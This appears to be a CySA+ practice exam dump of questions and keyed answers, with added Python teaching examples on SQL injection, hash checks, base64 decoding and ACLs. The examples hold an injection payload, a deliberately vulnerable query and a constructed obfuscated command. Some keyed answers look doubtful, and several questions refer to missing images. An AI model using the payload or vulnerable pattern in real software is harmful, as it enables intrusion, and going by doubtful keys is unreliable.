CSO-001 (CYSA+)
A malicious user is reviewing the following output: root:~#ping 192.168.1.137 64 bytes from 192.168.2.1 icmp_seq=1 ttl=63 time=1.58 ms 64 bytes from 192.168.2.1 icmp_seq=2 ttl=63 time=1.45 ms root: ~# Based on the above output, which of the following is the device between the malicious user and the target? A. Proxy B. Access point C. Switch D. Hub
A. Proxy
Syed is developing a vulnerability scanner program for a large network of sensors that are used to monitor his company's transcontinental oil pipeline. What type of network is this? A. SCADA B. BAS C. SoC D. CAN
A. SCADA
A centralized tool for organizing security events and managing their response and resolution is known as: A. SIEM B. HIPS C. Syslog D. Wireshark
A. SIEM
An analyst was tasked with providing recommendations of technologies that are PKI X.509 compliant for a variety of secure functions. Which of the following technologies meet the compatibility requirement? (Choose three.) A. 3DES B. AES C. IDEA D. PKCS E. PGP F. SSL/TLS G. TEMPEST
D. PKCS E. PGP F. SSL/TLS (AES, 3DES and IDEA are symmetric ciphers and TEMPEST is an emanations-security standard; none of them is defined in terms of X.509 certificates, whereas PKCS, PGP and SSL/TLS all work with them)
A security operations team was alerted to abnormal DNS activity coming from a user's machine. The team performed a forensic investigation and discovered a host had been compromised. Malicious code was using DNS as a tunnel to extract data from the client machine, which had been leaked and transferred to an unsecure public Internet site. Which of the following BEST describes the attack? A. Phishing B. Pharming C. Cache poisoning D. Data exfiltration
D. Data exfiltration
What is not a major category of security event indicator? A. Alerts B. Logs C. People D. Databases
D. Databases
Creating an isolated environment in order to test and observe the behavior of unknown software is also known as: A. sniffing B. hardening C. hashing D. sandboxing
D. Sandboxing
After scanning the main company's website with the OWASP ZAP tool, a cybersecurity analyst is reviewing the following warning: (see image Q-49a) The analyst reviews a snippet of the offending code: (see image Q-49b) Which of the following is the BEST course of action based on the above warning and code snippet? A. The analyst should implement a scanner exception for the false positive. B. The system administrator should disable SSL and implement TLS. C. The developer should review the code and implement a code fix. D. The organization should update the browser GPO to resolve the issue.
D. The organization should update the browser GPO to resolve the issue
A production web server is experiencing performance issues. Upon investigation, new unauthorized applications have been installed and suspicious traffic was sent through an unused port. Endpoint security is not detecting any malware or virus. Which of the following types of threats would this MOST likely be classified as? A. Advanced persistent threat B. Buffer overflow vulnerability C. Zero day D. Botnet
A. Advanced persistent threat
Which of the following best practices is used to identify areas in the network that may be vulnerable to penetration testing from known external sources? A. Blue team training exercises B. Technical control reviews C. White team training exercises D. Operational control reviews
A. Blue Team Training Exercises
What sanitization technique uses only logical techniques to remove data? A. Clear B. Degauss C. Destroy D. Purge
A. Clear
Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment? A. Place the malware on an isolated virtual server disconnected from the network. B. Place the malware in a virtual server that is running Windows and is connected to the network. C. Place the malware on a virtual server connected to a VLAN. D. Place the malware on a virtual server running SIFT and begin analysis.
A. Place the malware on an isolated virtual server disconnected from the network
What document typically contains high-level statements of management intent? A. Policy B. Standard C. Procedure D. Guideline
A. Policy
A company discovers an unauthorized device accessing network resources through one of many network drops in a common area used by visitors. The company decides that it wants to quickly prevent unauthorized devices from accessing the network but policy prevents the company from making changes on every connecting client. Which of the following should the company implement? A. Port security B. WPA2 C. Mandatory Access Control D. Network Intrusion Prevention
A. Port Security
During which phase of the incident response process does an organization assemble an incident response toolkit? A. Preparation B. Detection and analysis C. Containment, eradication, and recovery D. Post-incident activity
A. Preparation
A security analyst is concerned that employees may attempt to exfiltrate data prior to tendering their resignations. Unfortunately, the company cannot afford to purchase a data loss prevention system. Which of the following recommendations should the security analyst make to provide defense-in-depth against data loss? (Choose three.) A. Prevent users from accessing personal email and file-sharing sites via web proxy B. Prevent flash drives from connecting to USB ports using Group Policy C. Prevent users from copying data from workstation to workstation D. Prevent users from using roaming profiles when changing workstations E. Prevent Internet access on laptops unless connected to the network in the office or via VPN F. Prevent users from being able to use the copy and paste functions
A. Prevent users from accessing personal email and file-sharing sites via web proxy B. Prevent flash drives from connecting to USB ports using Group Policy E. Prevent Internet access on laptops unless connected to the network in the office or via VPN
A company has decided to process credit card transactions directly. Which of the following would meet the requirements for scanning this type of data? A. Quarterly B. Yearly C. Bi-annually D. Monthly
A. Quarterly
Dion Training's security team recently discovered a bug in their software's code. The development team released a software patch to remove the vulnerability caused by the bug. What type of test should a software tester perform on the application to ensure that the application is still functioning properly after the patch is installed? A. Regression Testing B. User Acceptance Testing C. Penetration Testing D. Fuzzing
A. Regression Testing
A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host? A. Reserved MACs B. Host IPs C. DNS routing tables D. Gateway settings
A. Reserved MACs
An organization is attempting to harden its web servers and reduce the information that might be disclosed by potential attackers. A security analyst is reviewing vulnerability scan results from a recent web server scan. Portions of the scan results are shown below: Finding#5144322 First Time Detected 10 Nov 2015 09:00GMT-0600 Last Time Detected 10 Nov 2015 09:00GMT-0600 CVSS Base: 5 Access Path: https://myOrg.com/mailingList.htm Request: https://myOrg.com/mailingList.aspx?content=volunteer Response: C:\Documents\MarySmith\mailingList.pdf Which of the following lines indicates information disclosure about the host that needs to be remediated? A. Response: C:\Documents\MarySmith\mailingList.pdf B. Finding#5144322 C. First Time Detected 10 Nov 2015 09:00 GMT-0600 D. Access Path: http://myOrg.com/mailingList.htm E. Request: GET http://myOrg.com/mailingList.aspx?content=volunteer
A. Response:C:\Documents\MarySmith\mailingList.pdf
Creating a lessons learned report following an incident will help an analyst to communicate which of the following information? (Choose two.) A. Root cause analysis of the incident and the impact it had on the organization B. Outline of the detailed reverse engineering steps for management to review C. Performance data from the impacted servers and endpoints to report to management D. Enhancements to the policies and practices that will improve business responses E. List of IP addresses, applications, and assets
A. Root cause analysis of the incident and the impact it had on the organization D. Enhancements to the policies and practices that will improve business responses
You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed 'history' into the prompt and see the output:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >echo 127.0.0.1 diontraining.com >> /etc/hosts-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which of the following best describes what actions were performed by this line of code? A. Routed traffic destined for the diontraining.com domain to the localhost B. Attempted to overwrite the host file and deleted all data except this entry C. Routed traffic destined for the localhost to the diontraining.com domain D. Added the website to the system's whitelist in the hosts file
A. Routed traffic destined for the diontraining.com domain to the localhost (">>" appends a line, so nothing else in /etc/hosts is overwritten; a 127.0.0.1 entry makes the name resolve to the local machine instead of its real address)
Scan results identify critical Apache vulnerabilities on a company's web servers. A security analyst believes many of these results are false positives because the web environment mostly consists of Windows servers. Which of the following is the BEST method of verifying the scan results? A. Run a service discovery scan on the identified servers. B. Refer to the identified servers in the asset inventory. C. Perform a top-ports scan against the identified servers. D. Review logs of each host in the SIEM.
A. Run a service discovery scan on the identified servers
A web developer wants to protect their new web application from a man-in-the-middle attack. Which of the following controls would best prevent an attacker from stealing tokens stored in cookies? A. Setting the secure attribute on the cookie B. Forcing the use of SSL for the web application C. Forcing the use of TLS for the web application D. Hashing the cookie value
A. Setting the secure attribute on the cookie
A computer has been infected with a virus and is sending out a beacon to command and control server through an unknown service. Which of the following should a security technician implement to drop the traffic going to the command and control server and still be able to identify the infected host through firewall logs? A. Sinkhole B. Block ports and services C. Patches D. Endpoint security
A. Sinkhole
You just received a notification that your company's email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails? A. The full email header from one of the spam messages B. Firewall logs showing the SMTP connections C. The SMTP audit log from the company's email server D. Network flows for the DMZ containing the email servers
A. The full email header from one of the spam messages
An incident response report indicates a virus was introduced through a remote host that was connected to corporate resources. A cybersecurity analyst has been asked for a recommendation to solve this issue. Which of the following should be applied? A. MAC B. TAP C. NAC D. ACL
C. NAC
An analyst has noticed unusual activities in the SIEM to a .cn domain name. Which of the following should the analyst use to identify the content of the traffic? A. Log review B. Service discovery C. Packet capture D. DNS harvesting
C. Packet capture
Following a data compromise, a cybersecurity analyst noticed the following executed query: SELECT * from Users WHERE name = rick OR 1=1 Which of the following attacks occurred, and which of the following technical security controls would BEST reduce the risk of future impact from this attack? (Choose two.) A. Cookie encryption B. XSS attack C. Parameter validation D. Character blacklist E. Malicious code execution F. SQL injection
C. Parameter validation F. SQL Injection
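The two chosen answers side by side, as an added example that is not part of the original question set: the string-concatenated query that makes the injection possible, the same lookup with a bound parameter, and an allow-list validator placed in front of it. The in-memory table, its rows and the payload are constructed for the example; the question's query has no quotes around the name, so its injection is even simpler than the quoted form shown here. Only the Users table name is taken from the question.

```python
import re
import sqlite3
from typing import List, Tuple


def build_db() -> sqlite3.Connection:
    # Constructed sample data; the Users table name is the only part from the question.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO Users (name, role) VALUES (?, ?)",
        [("rick", "user"), ("morty", "user"), ("admin", "admin")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    # The user-supplied value becomes part of the SQL text, so "' OR 1=1 --"
    # turns the WHERE clause into a tautology and the query returns every row.
    sql = f"SELECT * FROM Users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    # A bound parameter is passed as data and never parsed as SQL: the same
    # payload is compared literally against the name column and matches nothing.
    return conn.execute("SELECT * FROM Users WHERE name = ?", (name,)).fetchall()


NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_name(name: str) -> bool:
    # Allow-list parameter validation: accept only what a username can look like.
    # This is stricter than a character blacklist, which attackers routinely bypass.
    return NAME_RE.fullmatch(name) is not None


def lookup_hardened(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    # Defence in depth: validate the parameter, then still bind it.
    if not validate_name(name):
        raise ValueError(f"parameter rejected: {name!r}")
    return lookup_parameterized(conn, name)


if __name__ == "__main__":
    db = build_db()
    payload = "' OR 1=1 --"
    print("vulnerable:", len(lookup_vulnerable(db, payload)), "rows")      # 3
    print("parameterized:", len(lookup_parameterized(db, payload)), "rows")  # 0
```

Parameter validation alone is not enough when the value legitimately needs characters such as quotes (a surname like O'Brien); binding the parameter is the control that removes the injection, and validation narrows what reaches the query in the first place.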
A cybersecurity analyst is reviewing the report from their IDS and noticed that ports 1 to 1024 received SYN packets from a remote host. What likely caused this traffic? A. Remote host cannot find the right service port B. SYN Flood C. Port Scan D. UDP probe
C. Port Scan
The new Chief Technology Officer (CTO) is seeking recommendations for network monitoring services for the local intranet. The CTO would like the capability to monitor all traffic to and from the gateway, as well as the capability to block certain content. Which of the following recommendations would meet the needs of the organization? A. Recommend setup of IP filtering on both the internal and external interfaces of the gateway router. B. Recommend installation of an IDS on the internal interface and a firewall on the external interface of the gateway router. C. Recommend installation of a firewall on the internal interface and a NIDS on the external interface of the gateway router. D. Recommend installation of an IPS on both the internal and external interfaces of the gateway router.
D. Recommend installation of an IPS on both the internal and external interfaces of the gateway router (an IDS/NIDS only monitors and alerts; an IPS sits inline, monitors the traffic and can also block it, which covers both of the CTO's requirements on each interface)
Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application? A. File size and creation date B. Public key of the file C. MD5 or SHA1 hash digest of the file D. Private key of the file
C. MD5 or SHA1 hash digest of the file
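How that comparison is actually done, as an added example rather than anything from the question set: stream the file through a digest, parse the vendor's published "digest  filename" line, and compare in constant time. The fake installer and its tampered copy are constructed inside the example; the only assumption is that the vendor publishes the digest in the coreutils layout. The example defaults to SHA-256, since MD5 and SHA-1 are collision-prone and only worth using when the vendor publishes nothing stronger.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path
from typing import Tuple


def file_digest(path: Path, algo: str = "sha256", chunk: int = 1 << 16) -> str:
    # Stream the file so large installers never have to fit in memory.
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_checksum_line(line: str) -> Tuple[str, str]:
    # Accepts the "<hex>  filename" layout printed by sha256sum / md5sum / shasum.
    digest, name = line.split(maxsplit=1)
    return digest.lower(), name.lstrip("*")  # "*name" marks binary mode in coreutils


def verify_download(path: Path, published_digest: str, algo: str = "sha256") -> bool:
    # Constant-time comparison; normalise case so a pasted upper-case digest still matches.
    actual = file_digest(path, algo)
    return hmac.compare_digest(actual, published_digest.strip().lower())


def demo() -> Tuple[bool, bool]:
    # Constructed sample: write a fake installer, take its digest as the "vendor"
    # value, verify it, then append one byte and verify again.
    with tempfile.TemporaryDirectory() as tmp:
        installer = Path(tmp) / "installer.bin"
        contents = b"constructed installer contents\n"
        installer.write_bytes(contents)
        vendor_line = f"{hashlib.sha256(contents).hexdigest()}  installer.bin"
        published, _ = parse_checksum_line(vendor_line)
        before = verify_download(installer, published)
        installer.write_bytes(contents + b"\x00")  # size and date barely change, digest does not match
        after = verify_download(installer, published)
        return before, after


if __name__ == "__main__":
    print("untouched verifies:", demo()[0], "| tampered verifies:", demo()[1])
```

A digest only proves the file matches what the vendor published; if the digest was fetched over the same channel as the file, an attacker who can swap one can swap both, which is why a signature (vendor's public key) adds integrity the hash alone cannot.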
A network administrator is attempting to troubleshoot an issue regarding certificates on a secure website. During the troubleshooting process, the network administrator notices that the web gateway proxy on the local network has signed all of the certificates on the local machine. Which of the following describes the type of attack the proxy has been legitimately programmed to perform? A. Transitive access B. Spoofing C. Man-in-the-middle D. Replay
C. Man-in-the-middle
A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings were set to redirect all traffic through an unknown proxy. This type of attack is known as which of the following? A. Phishing B. Social engineering C. Man-in-the-middle D. Shoulder surfing
C. Man-in-the-middle
During the forensic phase of a security investigation, it was discovered that an attacker was able to find private keys on a poorly secured team shared drive. The attacker used those keys to intercept and decrypt sensitive traffic on a web server. Which of the following describes this type of exploit and the potential remediation? A. Session hijacking; network intrusion detection sensors B. Cross-site scripting; increased encryption key sizes C. Man-in-the-middle; well-controlled storage of private keys D. Rootkit; controlled storage of public keys
C. Man-in-the-middle; well-controlled storage of private keys
A software patch has been released to remove vulnerabilities from company's software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following tests should be performed NEXT? A. Fuzzing B. User acceptance testing C. Regression testing D. Penetration testing
C. Regression Testing
Which of the following commands would a security analyst use to make a copy of an image for forensics use? A. dd B. wget C. touch D. rm
A. dd
An organization uses Common Vulnerability Scoring System (CVSS) scores to prioritize remediation of vulnerabilities. Management wants to modify the priorities based on a difficulty factor so that vulnerabilities with lower CVSS scores may get a higher priority if they are easier to implement with less risk to system functionality. Management also wants to quantify the priority. Which of the following would achieve management's objective? A. (CVSS Score) * Difficulty = Priority Where Difficulty is a range from 0.1 to 1.0 with 1.0 being easiest and lowest risk to implement B. (CVSS Score) * Difficulty = Priority Where Difficulty is a range from 1 to 5 with 1 being easiest and lowest risk to implement C. (CVSS Score) / Difficulty = Priority Where Difficulty is a range from 1 to 10 with 10 being easiest and lowest risk to implement D. ((CVSS Score) * 2) / Difficulty = Priority Where CVSS Score is weighted and Difficulty is a range from 1 to 5 with 5 being easiest and lowest risk to implement
A. (CVSS Score)*Difficulty=Priority Where Difficulty is a range from 0.1 to 1.0 with 1.0 being easiest and lowest risk to implement
A business-critical application is unable to support the requirements in the current password policy because it does not allow the use of special characters. Management does not want to accept the risk of a possible security incident due to weak password standards. Which of the following is an appropriate means to limit the risks related to the application? A. A compensating control B. Altering the password policy C. Creating new account management procedures D. Encrypting authentication traffic
A. A compensating control
A security professional is analyzing the results of a network utilization report. The report includes the following information: (See image Q-42) Which of the following servers needs further investigation? A. hr.dbprod.01 B. R&D.file.srvr.01 C. mrktg.file.srvr.02 D. web.srvr.03
A. hr.dbprod.01
A cybersecurity analyst is conducting packet analysis on the following: (see image Q-160) Which of the following is occurring in the given packet capture? A. ARP spoofing B. Broadcast storm C. Smurf attack D. Network enumeration E. Zero-day exploit
A. ARP spoofing
A security analyst has noticed that a particular server has consumed over 1TB of bandwidth over the course of the month. It has port 3333 open; however, there have not been any alerts or notices regarding the server or its activities. Which of the following did the analyst discover? A. APT B. DDoS C. Zero day D. False positive
A. APT
After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company's network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company's information security team. How would you best classify this threat? A. Advanced persistent threat (APT) B. Insider threat C. Spear phishing D. Privilege escalation
A. Advanced persistent threat (APT)
A threat intelligence analyst who works for a financial services firm received this report: "There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware variant has been called "LockMaster" by researchers due to its ability to overwrite the MBR, but this term is not a malware signature. Please execute a defensive operation regarding this attack vector."The analyst ran a query and has assessed that this traffic has been seen on the network. Which of the following actions should the analyst do NEXT? (Choose two.) A. Advise the firewall engineer to implement a block on the domain B. Visit the domain and begin a threat assessment C. Produce a threat intelligence message to be disseminated to the company D. Advise the security architects to enable full-disk encryption to protect the MBR E. Advise the security analysts to add an alert in the SIEM on the string "LockMaster" F. Format the MBR as a precaution
A. Advise the firewall engineer to implement a block on the domain C. Produce a threat intelligence message to be disseminated to the company (full-disk encryption cannot protect the MBR, which must stay unencrypted for the system to boot, and "LockMaster" is a name given by researchers rather than a signature, so a SIEM alert on that string would match nothing)
Which model of software development emphasizes individuals and interactions over processes and tools, customer collaboration over contract negotiation, and working software over comprehensive documentation? A. Agile B. Spiral C. RAD D. Waterfall
A. Agile
You are reverse engineering a malware sample using the Strings tool when you notice the code inside appears to be obfuscated. You look at the following line of output on your screen: -=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=- ZWNobygiSmFzb24gRGlvbiBjcmVhdGVkIHRoaXMgQ29tcFRJQSBDeVNBKyBwcmFjdGljZSBleGFtIHF1ZXN0aW9uLiBJZiB5b3UgZm91bmQgdGhpcyBxdWVzdGlvbiBpbiBzb21lb25lIGVsc2UncyBjb3Vyc2UsIHRoZXkgc3RvbGUgaXQhIik7= -=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=- Based on the output above, which of the following methods do you believe the attacker used to prevent their malicious code from being easily read or analyzed? A. Base64 B. XML C. SQL D. QR coding
A. Base64
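A small helper for exactly this situation, added here as an example and not taken from the question set or from any vendor tool: pick base64-looking runs out of `strings` output, decode the ones that turn into printable text, and tolerate the stray trailing "=" that the sample in the question carries. The stand-in `strings` output, the hidden command and the variable names are all constructed for the example.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# A run of 20+ base64 alphabet characters with optional padding, as seen in `strings` output.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_b64_candidate(token: str) -> Optional[bytes]:
    # Tolerate sloppy padding (the sample in the question ends with one stray "=")
    # by stripping whatever padding is present and recomputing it.
    core = token.rstrip("=")
    if len(core) % 4 == 1:  # no valid base64 string has this length
        return None
    padded = core + "=" * (-len(core) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_text(raw: bytes) -> bool:
    # Long identifiers also match the regex; keep only decodes that are printable.
    return len(raw) > 0 and all(32 <= b < 127 or b in (9, 10, 13) for b in raw)


def find_encoded_strings(strings_output: str) -> List[Tuple[str, str]]:
    # Returns (encoded token, decoded text) pairs worth a second look.
    hits = []
    for m in B64_TOKEN.finditer(strings_output):
        raw = decode_b64_candidate(m.group(0))
        if raw is not None and looks_like_text(raw):
            hits.append((m.group(0), raw.decode("ascii")))
    return hits


# Constructed stand-in for `strings sample.exe` output (not a real binary).
_HIDDEN = base64.b64encode(b"cmd.exe /c whoami > C:\\Users\\Public\\out.txt").decode()
SAMPLE_STRINGS_OUTPUT = "\n".join([
    "kernel32.dll",
    "GetProcAddress",
    "VirtualAlloc",
    _HIDDEN + "=",  # stray padding, like the sample in the question
    "This program cannot be run in DOS mode.",
])


if __name__ == "__main__":
    for token, text in find_encoded_strings(SAMPLE_STRINGS_OUTPUT):
        print(f"{token[:24]}...  ->  {text}")
```

Base64 is encoding, not encryption: it hides a command from a casual `strings` pass and from naive signature matching, but anything that decodes to readable text is recovered by the first analyst who tries. Nested layers (base64 inside base64, or base64 of a compressed blob) are handled by running the decoder again on the output, which is why the printable check is kept separate from the decode step.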
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring? A. Behavior B. Trend C. Anomaly D. Heuristic
A. Behavior
An organization wants to harden its web servers. As part of this goal, leadership has directed that vulnerability scans be performed, and the security team should remediate the servers according to industry best practices. The team has already chosen a vulnerability scanner and performed the necessary scans, and now the team needs to prioritize the fixes. Which of the following would help to prioritize the vulnerabilities for remediation in accordance with industry best practices? A. CVSS B. SLA C. ITIL D. OpenVAS E. Qualys
A. CVSS
A cybersecurity analyst was asked to discover the hardware address of 30 networked assets. From a command line, which of the following tools would be used to provide ARP scanning and reflects the MOST efficient method for accomplishing the task? A. nmap B. tracert C. ping -a D. nslookup
A. nmap
A pharmacy gives its clients online access to their records and the ability to review bills and make payments. A new SSL vulnerability on a special platform was discovered, allowing an attacker to capture the data between the end user and the web server providing these services. After investigating the platform vulnerability, it was determined that the web services provided are being impacted by this new threat. Which of the following data types are MOST likely at risk of exposure based on this new threat? (Choose two.) A. Cardholder data B. Intellectual property C. Personal health information D. Employee records E. Corporate financial data
A. Cardholder data C. Personal health information
An analyst finds that unpatched servers have undetected vulnerabilities because the vulnerability scanner does not have the latest set of signatures. Management directed the security team to have personnel update the scanners with the latest signatures at least 24 hours before conducting any scans, but the outcome is unchanged. Which of the following is the BEST logical control to address the failure? A. Configure a script to automatically update the scanning tool. B. Manually validate that the existing update is being performed. C. Test vulnerability remediation in a sandbox before deploying. D. Configure vulnerability scans to run in credentialed mode.
A. Configure a script to automatically update the scanning tool
During which incident response phase is the preservation of evidence performed? A. Containment, eradication, and recovery B. Post-incident activity C. Preparation D. Detection and analysis
A. Containment, eradication, and recovery
A company has several internal-only, web-based applications on the internal network. Remote employees are allowed to connect to the internal corporate network with a company-supplied VPN client. During a project to upgrade the internal application, contractors were hired to work on a database server and were given copies of the VPN client so they could work remotely. A week later, a security analyst discovered an internal web-server had been compromised by malware that originated from one of the contractor's laptops. Which of the following changes should be made to BEST counter the threat presented in this scenario? A. Create a restricted network segment for contractors, and set up a jump box for the contractors to use to access internal resources. B. Deploy a web application firewall in the DMZ to stop Internet-based attacks on the web server. C. Deploy an application layer firewall with network access control lists at the perimeter, and then create alerts for suspicious Layer 7 traffic. D. Require the contractors to bring their laptops on site when accessing the internal network instead of using the VPN from a remote location. E. Implement NAC to check for updated proxy and location-based rules for PCs connecting to the internal network.
A. Create a restricted network segment for contractors, and set up a jump box for the contractors to use to access internal resources
Which of the following vulnerability scans would provide the best results if you want to determine if the target's configuration settings are correct? A. Credentialed scan B. Non-credentialed scan C. Internal scan D. External scan
A. Credentialed scan
A security analyst is reviewing packet captures to determine the extent of success during an attacker's reconnaissance phase following a recent incident.The following is a hex and ASCII dump of one such packet: (see image Q-238) Which of the following BEST describes this packet? A. DNS BIND version request B. DNS over UDP standard query C. DNS over TCP server status query D. DNS zone transfer request
A. DNS BIND version request
After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company's computer. 16:26:42.943463 IP 192.168.1.10:25 > 10.38.219.20:3389 Flags [P.], seq 1768:1901, ack 1, win 511, options [nop,nop,TS val 271989777 ecr 475239494], length 133 Which of the following ACLs, if implemented, will prevent further access ONLY to the unauthorized service and will not impact other services? A. DENY TCP ANY HOST 10.38.219.20 EQ 3389 B. DENY IP HOST 10.38.219.20 ANY EQ 25 C. DENY IP HOST 192.168.1.10 HOST 10.38.219.20 EQ 3389 D. DENY TCP ANY HOST 192.168.1.10 EQ 25
A. Deny TCP Any Host 10.38.219.20 eq 3389
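Why only option A satisfies "block the unauthorized service and nothing else", worked through as an added example that is not part of the question set: parse the four candidate rules with a deliberately simplified Cisco-style grammar (ACTION PROTO SRC DST [EQ PORT], with EQ qualifying the destination port, an assumption made for the example), then run each rule over the observed flow plus a few constructed flows: a second client reaching the same 3389 service, mail delivered to 192.168.1.10:25, and ordinary traffic from 10.38.219.20 to other ports. The observed flow and the four rules are from the question; everything else is constructed.

```python
from typing import Dict, List, Optional, Tuple

Packet = Dict[str, object]

# The flow from the capture in the question: 192.168.1.10:25 -> 10.38.219.20:3389.
OBSERVED: Packet = {"proto": "tcp", "src": "192.168.1.10", "sport": 25,
                    "dst": "10.38.219.20", "dport": 3389}

# The four candidate ACLs, as written in the question.
CANDIDATES = {
    "A": "DENY TCP ANY HOST 10.38.219.20 EQ 3389",
    "B": "DENY IP HOST 10.38.219.20 ANY EQ 25",
    "C": "DENY IP HOST 192.168.1.10 HOST 10.38.219.20 EQ 3389",
    "D": "DENY TCP ANY HOST 192.168.1.10 EQ 25",
}


def parse_rule(text: str) -> Dict[str, object]:
    # Simplified grammar assumed for this example:
    #   ACTION PROTO SRC DST [EQ PORT]   where SRC/DST are ANY or HOST <ip>
    # and EQ applies to the destination port. "IP" matches any transport protocol.
    toks = text.upper().split()
    action, proto = toks[0], toks[1].lower()
    pos, addrs = 2, []
    for _ in range(2):
        if toks[pos] == "ANY":
            addrs.append(None)
            pos += 1
        elif toks[pos] == "HOST":
            addrs.append(toks[pos + 1])
            pos += 2
        else:
            raise ValueError(f"unsupported address spec in {text!r}")
    port = int(toks[pos + 1]) if pos < len(toks) and toks[pos] == "EQ" else None
    return {"action": action, "proto": proto, "src": addrs[0], "dst": addrs[1], "dport": port}


def rule_matches(rule: Dict[str, object], pkt: Packet) -> bool:
    if rule["proto"] != "ip" and rule["proto"] != pkt["proto"]:
        return False
    if rule["src"] is not None and rule["src"] != pkt["src"]:
        return False
    if rule["dst"] is not None and rule["dst"] != pkt["dst"]:
        return False
    if rule["dport"] is not None and rule["dport"] != pkt["dport"]:
        return False
    return True


# Constructed traffic (not from the question): every flow to 10.38.219.20:3389 is the
# unauthorized service and must be stopped; the remaining flows must keep working.
UNAUTHORIZED: List[Packet] = [
    OBSERVED,
    {"proto": "tcp", "src": "192.168.1.50", "sport": 50123, "dst": "10.38.219.20", "dport": 3389},
]
LEGITIMATE: List[Packet] = [
    {"proto": "tcp", "src": "10.0.0.5", "sport": 51000, "dst": "192.168.1.10", "dport": 25},
    {"proto": "tcp", "src": "10.38.219.20", "sport": 52000, "dst": "192.168.1.10", "dport": 25},
    {"proto": "tcp", "src": "10.38.219.20", "sport": 52001, "dst": "192.168.1.10", "dport": 443},
]


def evaluate(rule_text: str) -> Tuple[bool, bool]:
    # (blocks every flow to the unauthorized service, blocks at least one legitimate flow)
    rule = parse_rule(rule_text)
    return (all(rule_matches(rule, p) for p in UNAUTHORIZED),
            any(rule_matches(rule, p) for p in LEGITIMATE))


def acceptable_rules() -> List[str]:
    # Keep only rules that stop all access to the service and touch nothing else.
    return [label for label, text in CANDIDATES.items() if evaluate(text) == (True, False)]


if __name__ == "__main__":
    for label, text in CANDIDATES.items():
        print(label, evaluate(text), text)
    print("acceptable:", acceptable_rules())
```

Option C fails because it only blocks one client of the service; B and D fail because they key on port 25 and would break mail to or from the hosts involved.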
A cybersecurity analyst is hired to review the security measures implemented within the domain controllers of a company. Upon review, the cybersecurity analyst notices a brute force attack can be launched against domain controllers that run on a Windows platform. The first remediation step implemented by the cybersecurity analyst is to make the account passwords more complex. Which of the following is the NEXT remediation step the cybersecurity analyst needs to implement? A. Disable the ability to store a LAN manager hash. B. Deploy a vulnerability scanner tool. C. Install a different antivirus software. D. Perform more frequent port scanning. E. Move administrator accounts to a new security group.
A. Disable the ability to store LAN manager hash
A company has received the results of an external vulnerability scan from its approved scanning vendor. The company is required to remediate these vulnerabilities for clients within 72 hours of acknowledgement of the scan results. Which of the following contract breaches would result if this remediation is not provided for clients within the time frame? A. Service level agreement B. Regulatory compliance C. Memorandum of understanding D. Organizational governance
A. Service level agreement
A security analyst is conducting traffic analysis and observes an HTTP POST to the company's main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of? A. Exfiltration B. DoS C. Buffer overflow D. SQL injection
B. DoS (a POST whose roughly 1,000-byte header trickles in one byte every ten seconds is a slow HTTP POST attack: it holds a server connection open for hours while carrying almost no data, and enough of them exhaust the connection pool; exfiltration moves data out, whereas this traffic moves almost nothing in)
During a review of security controls, an analyst was able to connect to an external, unsecured FTP server from a workstation. The analyst was troubleshooting and reviewed the ACLs of the segment firewall the workstation is connected to: (see image Q-144) Based on the ACLs above, which of the following explains why the analyst was able to connect to the FTP server? A. FTP was explicitly allowed in Seq 8 of the ACL. B. FTP was allowed in Seq 10 of the ACL. C. FTP was allowed as being included in Seq 3 and Seq 4 of the ACL. D. FTP was allowed as being outbound from Seq 9 of the ACL.
A. FTP was explicitly allowed in Seq 8 of the ACL
As part of the SDLC, software developers are testing the security of a new web application by inputting large amounts of random data. Which of the following types of testing is being performed? A. Fuzzing B. Regression testing C. Stress testing D. Input validation
A. Fuzzing
A software assurance lab is performing a dynamic assessment on an application by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab performing AND during which phase of the SDLC should this occur? (Choose two.) A. Fuzzing B. Behavior modeling C. Static code analysis D. Prototyping phase E. Requirements phase F. Planning phase
A. Fuzzing D. Prototyping phase
